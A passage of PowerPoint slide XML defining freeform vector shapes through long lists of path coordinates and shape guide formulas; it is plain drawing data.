                      <a:pt x="19" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8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13" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="425" y="2268"/>
                <a:ext cx="239" cy="148"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 734"/>
                  <a:gd name="T1" fmla="*/ 0 h 454"/>
                  <a:gd name="T2" fmla="*/ 0 w 734"/>
                  <a:gd name="T3" fmla="*/ 0 h 454"/>
                  <a:gd name="T4" fmla="*/ 0 w 734"/>
                  <a:gd name="T5" fmla="*/ 0 h 454"/>
                  <a:gd name="T6" fmla="*/ 0 w 734"/>
                  <a:gd name="T7" fmla="*/ 0 h 454"/>
                  <a:gd name="T8" fmla="*/ 0 w 734"/>
                  <a:gd name="T9" fmla="*/ 0 h 454"/>
                  <a:gd name="T10" fmla="*/ 0 w 734"/>
                  <a:gd name="T11" fmla="*/ 0 h 454"/>
                  <a:gd name="T12" fmla="*/ 0 w 734"/>
                  <a:gd name="T13" fmla="*/ 0 h 454"/>
                  <a:gd name="T14" fmla="*/ 0 w 734"/>
                  <a:gd name="T15" fmla="*/ 0 h 454"/>
                  <a:gd name="T16" fmla="*/ 0 w 734"/>
                  <a:gd name="T17" fmla="*/ 0 h 454"/>
                  <a:gd name="T18" fmla="*/ 0 w 734"/>
                  <a:gd name="T19" fmla="*/ 0 h 454"/>
                  <a:gd name="T20" fmla="*/ 0 w 734"/>
                  <a:gd name="T21" fmla="*/ 0 h 454"/>
                  <a:gd name="T22" fmla="*/ 0 w 734"/>
                  <a:gd name="T23" fmla="*/ 0 h 454"/>
                  <a:gd name="T24" fmla="*/ 0 w 734"/>
                  <a:gd name="T25" fmla="*/ 0 h 454"/>
                  <a:gd name="T26" fmla="*/ 0 w 734"/>
                  <a:gd name="T27" fmla="*/ 0 h 454"/>
                  <a:gd name="T28" fmla="*/ 0 w 734"/>
                  <a:gd name="T29" fmla="*/ 0 h 454"/>
                  <a:gd name="T30" fmla="*/ 0 w 734"/>
                  <a:gd name="T31" fmla="*/ 0 h 454"/>
                  <a:gd name="T32" fmla="*/ 0 w 734"/>
                  <a:gd name="T33" fmla="*/ 0 h 454"/>
                  <a:gd name="T34" fmla="*/ 0 w 734"/>
                  <a:gd name="T35" fmla="*/ 0 h 454"/>
                  <a:gd name="T36" fmla="*/ 0 w 734"/>
                  <a:gd name="T37" fmla="*/ 0 h 454"/>
                  <a:gd name="T38" fmla="*/ 0 w 734"/>
                  <a:gd name="T39" fmla="*/ 0 h 454"/>
                  <a:gd name="T40" fmla="*/ 0 w 734"/>
                  <a:gd name="T41" fmla="*/ 0 h 454"/>
                  <a:gd name="T42" fmla="*/ 0 w 734"/>
                  <a:gd name="T43" fmla="*/ 0 h 454"/>
                  <a:gd name="T44" fmla="*/ 0 w 734"/>
                  <a:gd name="T45" fmla="*/ 0 h 454"/>
                  <a:gd name="T46" fmla="*/ 0 w 734"/>
                  <a:gd name="T47" fmla="*/ 0 h 454"/>
                  <a:gd name="T48" fmla="*/ 0 w 734"/>
                  <a:gd name="T49" fmla="*/ 0 h 454"/>
                  <a:gd name="T50" fmla="*/ 0 w 734"/>
                  <a:gd name="T51" fmla="*/ 0 h 454"/>
                  <a:gd name="T52" fmla="*/ 0 w 734"/>
                  <a:gd name="T53" fmla="*/ 0 h 454"/>
                  <a:gd name="T54" fmla="*/ 0 w 734"/>
                  <a:gd name="T55" fmla="*/ 0 h 454"/>
                  <a:gd name="T56" fmla="*/ 0 w 734"/>
                  <a:gd name="T57" fmla="*/ 0 h 454"/>
                  <a:gd name="T58" fmla="*/ 0 w 734"/>
                  <a:gd name="T59" fmla="*/ 0 h 454"/>
                  <a:gd name="T60" fmla="*/ 0 w 734"/>
                  <a:gd name="T61" fmla="*/ 0 h 454"/>
                  <a:gd name="T62" fmla="*/ 0 w 734"/>
                  <a:gd name="T63" fmla="*/ 0 h 454"/>
                  <a:gd name="T64" fmla="*/ 0 w 734"/>
                  <a:gd name="T65" fmla="*/ 0 h 454"/>
                  <a:gd name="T66" fmla="*/ 0 w 734"/>
                  <a:gd name="T67" fmla="*/ 0 h 454"/>
                  <a:gd name="T68" fmla="*/ 0 w 734"/>
                  <a:gd name="T69" fmla="*/ 0 h 454"/>
                  <a:gd name="T70" fmla="*/ 0 w 734"/>
                  <a:gd name="T71" fmla="*/ 0 h 454"/>
                  <a:gd name="T72" fmla="*/ 0 w 734"/>
                  <a:gd name="T73" fmla="*/ 0 h 454"/>
                  <a:gd name="T74" fmla="*/ 0 w 734"/>
                  <a:gd name="T75" fmla="*/ 0 h 454"/>
                  <a:gd name="T76" fmla="*/ 0 w 734"/>
                  <a:gd name="T77" fmla="*/ 0 h 454"/>
                  <a:gd name="T78" fmla="*/ 0 w 734"/>
                  <a:gd name="T79" fmla="*/ 0 h 454"/>
                  <a:gd name="T80" fmla="*/ 0 w 734"/>
                  <a:gd name="T81" fmla="*/ 0 h 454"/>
                  <a:gd name="T82" fmla="*/ 0 w 734"/>
                  <a:gd name="T83" fmla="*/ 0 h 454"/>
                  <a:gd name="T84" fmla="*/ 0 w 734"/>
                  <a:gd name="T85" fmla="*/ 0 h 454"/>
                  <a:gd name="T86" fmla="*/ 0 w 734"/>
                  <a:gd name="T87" fmla="*/ 0 h 454"/>
                  <a:gd name="T88" fmla="*/ 0 w 734"/>
                  <a:gd name="T89" fmla="*/ 0 h 454"/>
                  <a:gd name="T90" fmla="*/ 0 w 734"/>
                  <a:gd name="T91" fmla="*/ 0 h 454"/>
                  <a:gd name="T92" fmla="*/ 0 w 734"/>
                  <a:gd name="T93" fmla="*/ 0 h 454"/>
                  <a:gd name="T94" fmla="*/ 0 w 734"/>
                  <a:gd name="T95" fmla="*/ 0 h 454"/>
                  <a:gd name="T96" fmla="*/ 0 w 734"/>
                  <a:gd name="T97" fmla="*/ 0 h 454"/>
                  <a:gd name="T98" fmla="*/ 0 w 734"/>
                  <a:gd name="T99" fmla="*/ 0 h 454"/>
                  <a:gd name="T100" fmla="*/ 0 w 734"/>
                  <a:gd name="T101" fmla="*/ 0 h 454"/>
                  <a:gd name="T102" fmla="*/ 0 w 734"/>
                  <a:gd name="T103" fmla="*/ 0 h 454"/>
                  <a:gd name="T104" fmla="*/ 0 w 734"/>
                  <a:gd name="T105" fmla="*/ 0 h 454"/>
                  <a:gd name="T106" fmla="*/ 0 w 734"/>
                  <a:gd name="T107" fmla="*/ 0 h 454"/>
                  <a:gd name="T108" fmla="*/ 0 w 734"/>
                  <a:gd name="T109" fmla="*/ 0 h 454"/>
                  <a:gd name="T110" fmla="*/ 0 w 734"/>
                  <a:gd name="T111" fmla="*/ 0 h 454"/>
                  <a:gd name="T112" fmla="*/ 0 w 734"/>
                  <a:gd name="T113" fmla="*/ 0 h 454"/>
                  <a:gd name="T114" fmla="*/ 0 w 734"/>
                  <a:gd name="T115" fmla="*/ 0 h 454"/>
                  <a:gd name="T116" fmla="*/ 0 w 734"/>
                  <a:gd name="T117" fmla="*/ 0 h 4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34"/>
                  <a:gd name="T178" fmla="*/ 0 h 454"/>
                  <a:gd name="T179" fmla="*/ 734 w 734"/>
                  <a:gd name="T180" fmla="*/ 454 h 45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34" h="454">
                    <a:moveTo>
                      <a:pt x="0" y="395"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
